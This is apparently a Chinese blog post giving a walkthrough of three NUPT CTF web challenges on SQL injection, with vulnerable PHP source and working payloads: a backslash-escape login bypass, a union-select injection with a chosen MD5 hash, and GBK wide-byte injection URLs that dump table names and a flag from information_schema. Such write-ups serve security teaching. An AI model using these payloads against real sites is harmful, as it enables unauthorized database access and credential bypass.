百度360必应搜狗淘宝本站头条
wireshark怎么抓包c++ base64for_eachwxsqlite3qt sleep
当前位置:网站首页 > 技术分析 > 正文

【Web-南邮CTF】Web-CTF入门第6天

liebian365 2024-11-20 18:25 21 浏览 0 评论

【黑客笔记--7天入门南邮CTF-WEB篇】


SQL注入

查看页面源代码有下面的提示信息

先看clean函数做了什么 直接干掉了引号啊 \' ==> '

function clean($str){
	if(get_magic_quotes_gpc()){
		$str=stripslashes($str);
	}
	return htmlentities($str, ENT_QUOTES);
}

$username = @clean((string)$_GET['username']);
$password = @clean((string)$_GET['password']);

$query='SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';';
$result=mysql_query($query);
if(!$result || mysql_num_rows($result) < 1){
	die('Invalid password!');
}

echo $flag;

分析一下SQL语句 一般来说注入的思路就是#截断SQL语句的password字段

'SELECT * FROM users WHERE name=\''.$username.'\' AND pass=\''.$password.'\';'

展开看是下面这样的结构

SELECT * FROM users WHERE name=

\' $username \'

AND pass=

\' $password \';

看看代码 靠闭合' 的思路是行不通了 为什么呢?因为\'会被转义 思路就是如何打破\'的束缚 方案就是干掉username后面的\' 让一个AND结构变成OR 结构 结果如下

SELECT * FROM users WHERE name=

\' admin\ \'

AND pass=

\' or 1=1# \';


SQL注入第2题

提示考察union的用法 要求输入的userpass要和数据库中的相同才算通过 靠猜是不可能的 那么直接通过POST请求体中输入的user打乱SQL语句吧

<?php
if($_POST[user] && $_POST[pass]) {
  mysql_connect(SAE_MYSQL_HOST_M . ':' . SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);
  mysql_select_db(SAE_MYSQL_DB);
  $user = $_POST[user];
  $pass = md5($_POST[pass]);
  $query = @mysql_fetch_array(mysql_query("select pw from ctf where user='$user'"));
  if (($query[pw]) && (!strcasecmp($pass, $query[pw]))) {
      echo "<p>Logged in! Key: ntcf{**************} </p>";
  }
  else {
    echo("<p>Log in failure!</p>");
  }
}
?>

首先我们拿到pass=hackbijimd5也就是add0ca38fedfc9e173d676deeca7e0e7

root@gt:~/Codes# php 8.php 
add0ca38fedfc9e173d676deeca7e0e7
root@gt:~/Codes# cat 8.php
<?php
$pass = 'hackbiji';
echo md5($pass)."\n";
?>

原始SQL语句 "select pw from ctf where user='$user'"

输入

user = -1' union select 'add0ca38fedfc9e173d676deeca7e0e7'# 或者

-1' union select 'add0ca38fedfc9e173d676deeca7e0e7

pass = hackbiji

最终的效果如下

select pw from ctf where user=' -1' union select 'add0ca38fedfc9e173d676deeca7e0e7'


宽字节注入

SQL注入经常使用'闭合SQL语句 如下测试 我们发现'被转义成\' 我们需要吃掉\

在我的【前端黑客】XSS入门 文章中有介绍宽字节问题

爆破数据库名:

id=%ef%27%20union%20select%201,database()%23

your sql:select id,title from news where id = '颸' union select 1,database()#'

拿到结果:sae-chinalover 对应16进制:0x7361652d6368696e616c6f766572


爆破数据库sae-chinalover的所有表名:

id=%ef%27%20union%20select%20group_concat(table_name),group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=0x7361652d6368696e616c6f766572%23

your sql:select id,title from news where id = '颸' union select group_concat(table_name),group_concat(table_name) from information_schema.tables where table_schema=0x7361652d6368696e616c6f766572#'

拿到结果:ctf,ctf2,ctf3,ctf4,news

对应的16进制:0x637466 0x63746632 0x63746633 0x63746634 0x6e657773


爆破表ctf4的所有列名:

id=%ef%27%20union%20select%20group_concat(column_name),group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=0x63746634%23

your sql:select id,title from news where id = '颸' union select group_concat(column_name),group_concat(column_name) from information_schema.columns where table_name=0x63746634#'

拿到结果:id,flag


爆破表ctf4flag列的数据

id=%ef%27%20union%20select%20flag,flag%20from%20ctf4%23

your sql:select id,title from news where id = '颸' union select flag,flag from ctf4#'

拿到结果:nctf{gbk_3sqli}


相关推荐

“版本末期”了?下周平衡补丁!国服最强5套牌!上分首选

明天,酒馆战棋就将迎来大更新,也聊了很多天战棋相关的内容了,趁此机会,给兄弟们穿插一篇构筑模式的卡组推荐!老规矩,我们先来看10职业胜率。目前10职业胜率排名与一周前基本类似,没有太多的变化。平衡补丁...

VS2017 C++ 程序报错“error C2065:“M_PI”: 未声明的标识符&quot;

首先,程序中头文件的选择,要选择头文件,在文件中是没有对M_PI的定义的。选择:项目——>”XXX属性"——>配置属性——>C/C++——>预处理器——>预处理器定义,...

东营交警实名曝光一批酒驾人员名单 88人受处罚

齐鲁网·闪电新闻5月24日讯酒后驾驶是对自己和他人生命安全极不负责的行为,为守护大家的平安出行路,东营交警一直将酒驾作为重点打击对象。5月23日,东营交警公布最新一批饮酒、醉酒名单。对以下驾驶人醉酒...

Qt界面——搭配QCustomPlot(qt platform)

这是我第一个使用QCustomPlot控件的上位机,通过串口精确的5ms发送一次数据,再将读取的数据绘制到图表中。界面方面,尝试卡片式设计,外加QSS简单的配了个色。QCustomPlot官网:Qt...

大话西游2分享赢取种族坐骑手办!PK趣闻录由你书写

老友相聚,仗剑江湖!《大话西游2》2021全民PK季4月激燃打响,各PK玩法鏖战齐开,零门槛参与热情高涨。PK季期间,不仅各种玩法奖励丰厚,参与PK趣闻录活动,投稿自己在PK季遇到的趣事,还有机会带走...

测试谷歌VS Code AI 编程插件 Gemini Code Assist

用ClaudeSonnet3.7的天气测试编码,让谷歌VSCodeAI编程插件GeminiCodeAssist自动编程。生成的文件在浏览器中的效果如下:(附源代码)VSCode...

顾爷想知道第4.5期 国服便利性到底需优化啥?

前段时间DNF国服推出了名为“阿拉德B计划”的系列改版计划,截至目前我们已经看到了两项实装。不过关于便利性上,国服似乎还有很多路要走。自从顾爷回归DNF以来,几乎每天都在跟我抱怨关于DNF里面各种各样...

掌握Visual Studio项目配置【基础篇】

1.前言VisualStudio是Windows上最常用的C++集成开发环境之一,简称VS。VS功能十分强大,对应的,其配置系统较为复杂。不管是对于初学者还是有一定开发经验的开发者来说,捋清楚VS...

还嫌LED驱动设计套路深?那就来看看这篇文章吧

随着LED在各个领域的不同应用需求,LED驱动电路也在不断进步和发展。本文从LED的特性入手,推导出适合LED的电源驱动类型,再进一步介绍各类LED驱动设计。设计必读:LED四个关键特性特性一:非线...

Visual Studio Community 2022(VS2022)安装图文方法

直接上步骤:1,首先可以下载安装一个VisualStudio安装器,叫做VisualStudioinstaller。这个安装文件很小,很快就安装完成了。2,打开VisualStudioins...

Qt添加MSVC构建套件的方法(qt添加c++11)

前言有些时候,在Windows下因为某些需求需要使用MSVC编译器对程序进行编译,假设我们安装Qt的时候又只是安装了MingW构建套件,那么此时我们该如何给现有的Qt添加一个MSVC构建套件呢?本文以...

Qt为什么站稳c++GUI的top1(qt c)

为什么现在QT越来越成为c++界面编程的第一选择,从事QT编程多年,在这之前做C++界面都是基于MFC。当时为什么会从MFC转到QT?主要原因是MFC开发界面想做得好看一些十分困难,引用第三方基于MF...

qt开发IDE应该选择VS还是qt creator

如果一个公司选择了qt来开发自己的产品,在面临IDE的选择时会出现vs或者qtcreator,选择qt的IDE需要结合产品需求、部署平台、项目定位、程序猿本身和公司战略,因为大的软件产品需要明确IDE...

Qt 5.14.2超详细安装教程,不会来打我

Qt简介Qt(官方发音[kju:t],音同cute)是一个跨平台的C++开库,主要用来开发图形用户界面(GraphicalUserInterface,GUI)程序。Qt是纯C++开...

Cygwin配置与使用(四)——VI字体和颜色的配置

简介:VI的操作模式,基本上VI可以分为三种状态,分别是命令模式(commandmode)、插入模式(Insertmode)和底行模式(lastlinemode),各模式的功能区分如下:1)...

取消回复欢迎 发表评论:

一周热门
最近发表
标签列表
Copyright Your WebSite.Some Rights Reserved.